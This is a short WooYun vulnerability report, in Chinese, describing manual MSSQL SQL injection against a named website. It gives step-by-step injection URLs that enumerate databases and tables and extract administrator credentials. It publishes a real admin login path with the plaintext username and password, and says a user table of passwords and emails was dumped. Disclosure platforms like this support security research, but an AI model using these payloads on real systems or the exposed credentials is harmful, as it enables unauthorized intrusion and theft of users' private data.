WooYun.org

注入点看过来：http://www.cceen.com/showinfo.asp?o=88 只是做了简单的测试，没有做任何坏事~~~
今天大周末的天气不错，看到个站，竟然可以注入~~直接手工吧，我太懒不想开工具了~~
一、测试了下，是MSSQL啊：http://www.cceen.com/showinfo.asp?o=88 and (select count(*) from sysobjects)>0，那就开始爆库吧~~~
二、直接爆库，希望别太多，手工爆着麻烦~~：http://www.cceen.com/showinfo.asp?o=88 and db_name(1)>0-- 哈哈，看看下图，爆出了个master，一看名字就知道了，你懂的

三、竟然让我得到了这么一个可爱的裤子，那就来看看里面有什么表老~http://www.cceen.com/showinfo.asp?o=88 and (select top 1 name from sysobjects where xtype=char(85))>0--

四、又看到了一个adminuser的表，这下看来又有戏了，管理员，你快出来吧~~直接爆adminuser中的用户名和密码：

五、看到admin都出来了，就找了一下后台登录试试吧：http://www.cceen.com/admin/admin_Login.asp 用户名：admin 密码：admin123，直接登录成功，进入了后台

我只是试试能不能进来，别的坏事真的啥也没干~~
六：看到还有很多裤子，还有个userdata的表，表示手工注入有点累了，还是用工具跑下吧：用户名、密码（明文哟亲）、邮箱，全都出来了。直接贴上跑出来的结果吧：